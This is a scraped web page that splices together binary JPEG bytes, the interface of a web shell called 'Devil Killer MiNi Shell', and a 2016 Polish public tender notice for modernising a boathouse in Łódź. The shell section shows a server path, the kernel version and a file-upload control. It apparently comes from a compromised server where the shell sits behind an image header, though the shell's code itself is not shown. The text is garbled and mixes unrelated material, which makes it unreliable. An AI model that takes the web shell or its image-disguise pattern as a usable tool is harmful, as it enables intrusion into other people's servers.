JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161014/324323-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 324323 - 2016
              z dnia 2016-10-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Łódź: Modernizacja przystani wodnej na obiekcie rekreacyjnym Stawy Jana w Łodzi przy ul. Rzgowskiej 247<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Łódź - Miejski Ośrodek Sportu i Rekreacji w Łodzi, krajowy numer identyfikacyjny
              00000100855997, ul.
              ul. Ks. Skorupki 
              21,
              90532  
              Łódź, woj.
              łódzkie, państwo
              , tel.
              42 27 21 416; 27 21 417, e-mail
              przetargi@mosir.lodz.pl ; a.stasiak@mosir.lodz.pl, faks
              42 6367980.
              <br />
              Adres strony internetowej (URL): http://mosirl.bip.eur.pl/public/?id=100855<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednotka budżetowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://mosirl.bip.eur.pl/public/?id=100855</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://mosirl.bip.eur.pl/public/?id=100855</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />Miejski Ośrodek Sportu i Rekreacji w Łodzi 90-532 Łódź, ul. ks. Skorupki 21 - sekretariat pokój 203</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Modernizacja przystani wodnej na obiekcie rekreacyjnym Stawy Jana w Łodzi przy ul. Rzgowskiej 247<br /><b>Numer referencyjny: </b>32/16/PN<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest: Modernizacja przystani wodnej na obiekcie rekreacyjnym Stawy Jana w Łodzi przy ul. Rzgowskiej 247, według opisu:

Modernizacja budynku obejmuje:

- przebudowa schodów terenowych
- rozbudowa przystani wodnej o 5 stanowisk do cumowania sprzętu pływającego,
- wymiana utwardzenia fragmentu terenu przy budynku,
- wymiana ogrodzenia wewnętrznego
- projektowanie balustrad dla schodów terenowych.
- wykonanie nowego pokrycia dachu
- wykonanie nowych posadzek w części administracyjno-socjalnej
- przebudowę sanitariatu wraz z remontem instalacji wod-kan (projekt i przedmiar w folderze Remont przystani St.Jana).
- docieplenie i tynkowanie ścian zewnętrznych
- montaż sufitów podwieszanych w części administracyjno-socjalnej
- wymianę okien i drzwi
- przetarcie istniejących tynków i wykonanie nowych
- wykonanie okładzin ściennych (glazura) w w.c i pomieszczeniu socjalnym
- malowanie pomieszczeń farbami emulsyjnymi
- wykonanie remontu instalacji elektrycznej (projekt i przedmiar w folderze Remont przystani St.Jana)

Opis stanu istniejącego.
Budynek przystani wodnej ,parterowy ,zrealizowany w technologii tradycyjnej o podłużnym układzie murowanych ścian nośnych. W budynku znajdują się następujące pomieszczenia. Magazyn sprzętu pływającego, kasa, pomieszczenie socjalne, pomieszczenie ratowników, pomieszczenie gospodarcze i w.c. Budynek sezonowy użytkowany w okresie letnim, nieogrzewany . Ściany budynku murowane z cegły ceramicznej pełnej obustronnie tynkowane z wyjątkiem magazynu sprzętu pływającego (brak tynków wewnętrznych). Dach o konstrukcji drewnianej , jednospadowy, kryty papą na deskowaniu. W części magazynowej podparty podciągami dachowymi drewnianymi na słupach żelbetowych. Stolarka okienna i drzwiowa drewniana mocno zniszczona. Posadzki cementowe z warstwą wierzchnią z wykładziny pcw mocno zniszczone. Tynki wewnętrzne za wyjątkiem magazynu ( brak tynków) zabrudzone z licznymi śladami zarysowań i spękań. Powłoki malarskie mocno zabrudzone, łuszczące się.
Opis techniczny remontu (projekt techniczny architektoniczno-budowlany wraz z przedmiarem znajduje się w folderze Remont przystani St.Jana) 
Zakres prac obejmuje:
- wykonanie nowego pokrycia dachu
- przebudowę sanitariatu
- docieplenie i tynkowanie ścian zewnętrznych
- montaż sufitów podwieszanych w części administracyjno-socjalnej
- wymianę okien i drzwi
- docieplenie ścian styropianem
- wykonanie nowych tynków
- wykonanie okładzin ściennych ( glazura ) w w.c i pomieszczeniu socjalnym
- malowanie pomieszczeń farbami emulsyjnymi
- wykonanie nowych posadzek w części administracyjno-socjalnej
 Pokrycie dachu
Z uwagi na znaczne koszty utylizacji papy zaprojektowano na istniejącym pokryciu papowym nowe z blachy trapezowej T-35 gr.0.75mm powlekanej w kolorze szarym (RAL 7040) na łatach drewnianych impregnowanych 6x4cm mocowanych co 1.40m do drewnianej konstrukcji dachu. Rozbudowa gzymsu od strony północnej ze sklejki wodoodpornej gr.15mm. Istniejące deskowanie dachu należy od spodu wymalować preparatem grzybobójczym i ogniochronnym Fobos M 4. W magazynie sprzętu pływającego ściany zewnętrzne nie są związane z pozostałą konstrukcją budynku. Należy je wzmocnić (usztywnić) poprzez przeniesienie obciążeń z wsporników dachu( krokwie) na pilasty ścian zewnętrznych o gr.12cm . Podparcie krokwi wzdłuż ścian zewnętrznych belką drewnianą o przekroju 12 x16cm ,opartą na pilastrach murowanych za pośrednictwem słupków drewnianych o przekroju 12 x 12 cm mocowanych do pilastrów ścian zewnętrznych. Tarcica klasy K21 impregnowana.
Rynny i rury spustowe
Odwodnienie dachu poprzez rynny  150mm i rury spustowe  125 mm z pcw w kolorze jasno szarym
Obróbki blacharskie
Z blachy stalowej ocynkowanej, powlekanej gr.0.8mm w kolorze szarym. Obróbki łączyć na rąbek stojący.
Naprawa ścian zewnętrznych
Mury w miejscu spękań wzmocnić poprzez wykucie bruzd prostopadłych do powstałych rys o głębokości 2.5 3.0 cm co piątą warstwę cegły. W przypadku rys przechodzących przez całą grubość ściany wykonać bruzdy obustronnie a w przypadku rys jednostronnych bruzdy wykonać od strony rysy. Długość bruzd musi sięgać minimum 50 cm poza rysę. Po mechanicznym oczyszczeniu bruzd sprężonym powietrzem lub szczotkami drucianymi i zwilżeniu wodą wypełnić je gęstą , mocną zaprawą cementową o stosunku 1:3 w którą należy wcisnąć pręty zbrojeniowe  8 ze stali A-0. Po związaniu zaprawy w bruzdach rysy i spękania wypełnić ciekłą zaprawą cementową pod ciśnieniem ( metoda iniekcji ). Ściany w miejscach występowania rys o znacznej szerokość rysy wzmocnić przez klamrowanie obustronne. Klamry zaprojektowano z płaskownika 6 x 80 mm kotwionego w murze metalowymi kołkami rozporowymi M 16/150mm o maksymalnym rozstawie co 1.0 m. Po zamontowaniu klamer rysy wypełnić zaprawą cementową j.w. Elementy stalowe zabezpieczyć antykorozyjnie poprzez malowanie farbą miniowa dwukrotnie.
Docieplenie ścian zewnętrznych:
Po dokonaniu naprawy spękanych ścian z uwagi na znaczne nierówności należy je ocieplić systemowo styropianem EPS 40 fasada gr.15 cm metodą lekką mokrą. Metoda ta polega na przymocowaniu do powierzchni zewnętrznej ścian ciągłej warstwy płyt izolacji termicznej (najlepiej frezowanych) a następnie pokryciu ich cienką warstwą zaprawy zbrojonej siatką szklaną. Płyty izolacji termicznej przyklejane są do ścian zaprawą klejową i w zależności od potrzeb dodatkowo grzybkowymi łącznikami tworzywowymi. Należy wykonać również docieplenie ściany oddzielającej magazyn od pomieszczeń socjalnych. Łączniki tworzywowe powinny być osadzane na głębokości ok. 2 cm od powierzchni docieplenia. Kapelusz grzybkowego łącznika tworzywowego należy zakryć deklem styropianowym lub wełny mineralnej doprowadzając do jednolitej powierzchni docieplenia. Warstwa ochronna docieplenia z zaprawy klejowej zbrojonej siatką z włókna szklanego. Mocowanie izolacji termicznej ( styropian , wełna mineralna) i wykonanie poszczególnych warstw zgodnie z instrukcją systemową. Na tak wykonane warstwy nakłada się wyprawą tynkarska o gr.2-4mm. Zaprojektowano tynk cienkowarstwowy silikonowy a na cokole tynk dekoracyjnymozaikowy. Na fragmentach elewacji - tynk ozdobny drewno. Przyjęty rodzaj tynku - tynk mineralny ozdobny imitujący drewno poprzez odciskanie w tynku specjalnych form sylikonowych a następnie pokrywany impregnatem koloryzującym.
UWAGA: 
Po dociepleniu ścian zewnętrznych należy zamontować kotwice na ścianie będące w posiadaniu inwestora.
Kolorystyka ścian według system firmy CAPAROL lub równoważny:
Tynk silikonowy jasny szary SCHIEFER 15 lub równoważny
Tynk silikonowy ciemny szary SCHIEFER 13 lub równoważny
- Wymagane parametry dla tynku:
Uziarnienie - 1.5 mm
Gęstość 1.7-1.9 g/cm3
gęstość strumienia dyfuzji pary wodnej V- 110-160g/m3 d
Współczynnik dyfuzji pary wodnej m=70-100
Współczynnik dyfuzji pary wodnej sd=0.20m
Kapilarne podciąganie wody w = 0.05kg/m2h1/2
  Tynk ozdobny drewno Iberia Pine
Kolorystykę ścian przyjęto w oparciu o system CERESIT VISAGE: Norway Pine. Przyjęty rodzaj tynku- tynk mineralny ozdobny imitujący drewno poprzez odciskanie w tynku specjalnych form sylikonowych a następnie pokrywany impregnatem koloryzującym. Tynk mozaikowy SZARY-116.
Kolorystyka cokołu ścian według systemu firmy ATLAS:
Opis kolorystyki na elewacjach w części rysunkowej opracowania .
W celu dodatkowego zabezpieczenia elewacji przed wandalizmem (graffiti) proponuje się wymalowanie powierzchni zewnętrznej preparatem antygraffiti matowym i bezbarwnym
Posadzki z gresu/terakoty
Płytki gresowe matowe , antypoślizgowe, mrozoodporne, podłogowe występują w w.c, kasie, pomieszczeniu do spożywania posiłków własnych i pom. ratowników. Wymiary płytek 200x200 mm lub 300x300 mm ,szerokość spoin 3 mm, fugowanie masą do fugowania wysokiej jakości, zastosowaną zgodnie z zaleceniami producenta. Produkt: do uzgodnienia z użytkownikiem. Na styku ze ścianami pionowy cokół o wysokości 100 mm z gresu identycznego jak podłoga, ze spoinami korespondującymi z układem na posadzce.
Drzwi i wrota
- Drzwi zewnętrzne
Drzwi zewnętrzne stalowe ocieplane DZ-1 (90x200  wymiar przejścia w świetle) w kolorze jasno-szarym. Wyposażone w zamki patentowe i samozamykacz. Maksymalny współczynnik U = 1,7 W/m2K.
- Drzwi wewnętrzne
Drzwi D-1 (90x200) wymiar przejścia w świetle .Drzwi wewnętrzne jedno-skrzydłowe pełne z materiałów drewnopochodnych, okleinowane. Wykładane na ścianę. Futryny drewniane okleinowane. Wyposażone w samozamykacze. Wyposażone w zamki patentowe.
- Wrota
Wrota do magazynu sprzęty pływającego dwuskrzydłowe, stalowe, nieocieplone w wykonaniu indywidualnym o wymiarach
 Okna i parapety
Okno o kwaterach rozwieralno-uchylnych wyposażone w mechanizm rozszczelniania.
Maksymalny współczynnik U = 1.3 W / m 2 K. Szklenie dwuszybowe. Okna z profili pcw w kolorze białym, strona zewnętrzna w kolorze jasno szarym RAL 7035. Okna wyposażyć dodatkowo w nawietrzaki montowane w ramie okna.
Do kasy okno z okienkiem podawczym. Pozostałe okna szt. 5 o wymiarach takich jak okno kasowe.
Uwaga: Ostateczne wielkości okien ustalić na budowie po szczegółowej inwentaryzacji otworów.
Parapety zewnętrzne z blachy stalowej ocynkowanej powlekanej w kolorze zależnym od koloru okna (patrz wykaz okien I drzwi) gr.0.80 mm w wykonaniu indywidualnym. Ostateczną
szerokość parapetów ustalić na budowie . Parapety wewnętrzne drewniane z płyt drewnopodobnych okleinowane wg. uznania Inwestora.
 Ściany wewnętrzne
Ściany wewnętrzne murowane z cegły ceramicznej pełnej kl.100 grubość 12 cm na zaprawie cementowej
 Wykończenie ścian wewnętrznych
W pomieszczeniu socjalnym , w.c i wokół umywalek w pozostałych pomieszczeniach wykończone materiałem zmywalnym sanitarnych odpornym na działanie wilgoci-płytki ceramiczne o wymiarach 20/20 lub 30/30cm do wysokości 200 cm od posadzki, powyżej malowanie akrylowe zmywalne. Wykonać odpowiednie otwory rewizyjne zapewniające dogodny dostęp do zaworów instalacji przykrytych ściankami. Pokrywy otworów rewizyjnych na ścianach wykonać z płytek ceramicznych i zamocować przy pomocy magnesów. W pomieszczeniu sprzętu pływającego tynki na ścianach cementowo-wapienne
 Sufity podwieszone
Sufity należy montować na następujących wysokościach:
- pom.ratownika 3,10m
- wc+ pom. gosp. 2,5m
- pom. kasy 3,30m
- pom. posiłków własnych 2,80m
Sufity kasetonowe 60x 60 cm o zwiększonej odporności na wilgoć na podkonstrukcji systemowej z profilii cienkościennych. Sufity podwiesić do konstrukcji nośnej dachu I stropów na odpowiednim systemie zawieszenia, zawierającym wszystkie niezbędne profile, szyny, wieszaki regulowane i inne akcesoria, w ilości niezbędnej do pełnej instalacji. W pomieszczeniach umywalni należy zamontować sufity o zwiększonej odporności na wilgoć.
Nadproża
W ścianach projektowanych nadproża stalowe dwuteownik 140, w ścianach istniejących nadproża stalowe z dwuteowników 200.
Wentylacja
Wentylacja pomieszczeń wywietrzakami dachowymi  160mm. W pomieszczeniu w.c. i pomieszczeniu do spożywania posiłków własnych wentylacja grawitacyjna wspomagana wentylatorami kanałowymi. załączanym ręcznie w rejonie drzwi.
ZABEZPIECZENIA ANTYKOROZYJNE
Elementy konstrukcji stalowej nie wymagające zabezpieczenia p.poż. po uprzednim przygotowaniu powierzchni do 1 stopnia czystości zabezpieczyć przez dwukrotne malowanie farbą miniowa podkładową i chlorokauczukową nawierzchniową . Łączna grubość powłoki 180 m. Kolorystyka wg. opisu do elewacji.
PONADTO NALEŻY WYKONAĆ
Na istniejących pomostach nabrzeża należy wymienić pokrycie konstrukcji stalowej pomostów zgodnie z projektem opisującym budowę nowych pomostów. Wykonać dodatkową instalację elektryczną do zasilania grzejników elektrycznych w pomieszczeniach przystani (część socjalna).
Wykonać instalację alarmową oraz monitorującą:
	zamontowane kamery maja być kamerami cyfrowymi, zapewniającymi jakość zapisu full HD umożliwiającą identyfikację pokazanych w nim osób (w razie potrzeby, żeby mogły być materiałem dowodowym). Kamery mają mieć rozdzielczość co najmniej 4 Mpx. Kamery montowane na zewnątrz muszą być przystosowane do pracy na zewnątrz, w różnych warunkach atmosferycznych. 
	zainstalowane zostaną urządzenia umożliwiające zapis nagrań ze wszystkich kamer monitoringu przez okres co najmniej 30 dni
	urządzenie rejestrujące będzie znajdować się w budynku przystani. Rejestrator zostanie zabezpieczony przed fizycznym dostępem osób nieupoważnionych
	instalacja wyposażona będzie w co najmniej jeden monitor, wielkości co najmniej 22'' umożliwiający podgląd ze wszystkich zainstalowanych kamer
	wykonawca dostarczy urządzenie UPS podtrzymujące pracę rejestratora i co najmniej dwóch kamer (zainstalowanych w biurze i jego najbliższym sąsiedztwie)
	montaż min. 3 tabliczek informacyjnych teren monitorowany w miejscach uzgodnionych z Zamawiającym
	montaż we wskazanych miejscach 4 lamp halogenowych załączających się po zmierzchu wyposażonych w czujnik ruchu o zasięgu co najmniej 15 m.
	system ma być zabezpieczony antyprzepięciowo i odgromowo
	wykorzystanie czujek o zasięgu co najmniej 12 m (zgodnie z załączonym schematem 9 czujek dualnych (podczerwień + mikrofala) oraz 14 czujek podczerwień w tym jedna czujka, zamontowana przy wejściu, z funkcją antymaskingu)
	montaż  sygnalizatora akustyczno  optycznego na zewnątrz budynku. 
	zainstalowanie zasilania awaryjnego podtrzymującego pracę systemu alarmowego przez co najmniej 72 godziny
	podpięcie instalacji alarmowej pod nadajnik alarmowy firmy ochroniarskiej we współpracy z firmą ochraniającą obiekt, lub zamontowanie modułu GSM umożliwiającego przesył danych do siedziby MOSiR ul.Skorupki 21. 
	wszystkie przewody mają być wkute w ściany lub poprowadzone w przestrzeni nad sufitowej.
	wykonane prace będą objęte co najmniej 24 miesięczną gwarancją (materiały i robocizna).
	w przypadku awarii w okresie gwarancji wykonawca w ciągu 24 godzin zdiagnozuje usterkę i w ciągu max 72 godz ją usunie (w razie potrzeby zapewniając wykorzystanie sprzętu zamiennego)
	zamawiający wymaga przygotowania i przekazania po zakończeniu prac dokumentacji powykonawczej opisującej topologię fizyczną i logiczną wdrożonego systemu

Dokonać wymiany okien zgodnie z rysunkiem rzutu przyziemia. Wymiary okien zgodne z projektem. Okna muszą być zintegrowane z roletą zewnętrzną.
Na elewacji należy zamontować dwie kotwice, które należy przetransportować z obiektu Stawy Stefańskiego ul. Wirowa na miejsce wbudowania tj. Stawy Jana. Kotwice należy poddać renowacji przez piaskowanie i malowanie farbami antykorozyjnymi oraz farbą nawierzchniową w kolorze RAL 7035 jasny szary. 
Ściany zewnętrzne w miejscach oznaczonych na projekcie jako drewnopodobne należy obudować deskami elewacyjnymi z drewna modyfikowanego lakierowanego lakierami do wymalowań zewnętrznych. Kolor do uzgodnienia z projektantem i inwestorem. Deski elewacyjne należy montować na ruszcie drewnianym z materiału analogicznego z jakiego zostało wykonane drewno elewacyjne. Okładzina drewniana musi być tak zamontowana aby licowała z dociepleniem. Pomiędzy ścianą a warstwą okładziny drewnianej należy umieścić warstwę ocieplającą ze styropianu lub wełny skalnej i przepony wiatroszczelnej. 

Wykonawca zobowiązany jest do naprawienia (na własny koszt) wszelkich uszkodzeń ścieżek powstałych w trakcie realizacji zamówienia a spowodowane przez środki transportu wykonawcy.
Do obowiązków Wykonawcy należy również usunięcie z terenu robót wszelkich zanieczyszczeń powstałych w wyniku prowadzonych robót oraz zbędnych elementów demontowanych z remontowanego obiektu lub jego otoczenia (gruz, ziemia).

Wszystkie roboty należy wykonać zgodnie z projektem technicznym, opisem przedmiotu zamówienia, specyfikacją techniczną wykonania i odbioru robót oraz sztuką budowlaną. Dokumentacja techniczna zawarta jest w folderze o nazwie Remont przystani St.Jana.

UWAGA: 
Wymagania dotyczące zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę.
Zamawiający stosownie do art. 29 ust. 3a ustawy, wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących następujące czynności warunków zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1* ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy.
*art. 22 § 1 ustawy z dnia 26 czerwca 1976 r. -Kodeks pracy: Przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca - do zatrudniania pracownika za wynagrodzeniem.
1.	Sposób i okres wymaganego zatrudnienia osób realizujących czynności w zakresie realizacji zamówienia.
Zamawiający wymaga, aby wszystkie osoby realizujące przedmiot zamówienia, które wykonywać będą czynności faktycznie związane z przedmiotem zamówienia opisane w specyfikacji istotnych warunków zamówienia zostały zatrudnione przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, w wymiarze czasu pracy min. 0,5 etatu. Liczba zatrudnionych osób ma wynosić min. 2 osoby.
Wykonawca lub podwykonawca zatrudni wyżej wymienione osoby na okres realizacji zamówienia. W przypadku rozwiązania stosunku pracy przed zakończeniem tego okresu, zobowiązuje się do niezwłocznego zatrudnienia na to miejsce innej osoby.
2.	Rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia
a)	Czynności robotnika opisane w przedmiarze robót.
3.	Uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań, o których mowa w art. 29 ust. 3a, oraz sankcji z tytułu niespełnienia tych wymagań.
3.1.	Sposób dokumentowania zatrudnienia ww. osób.
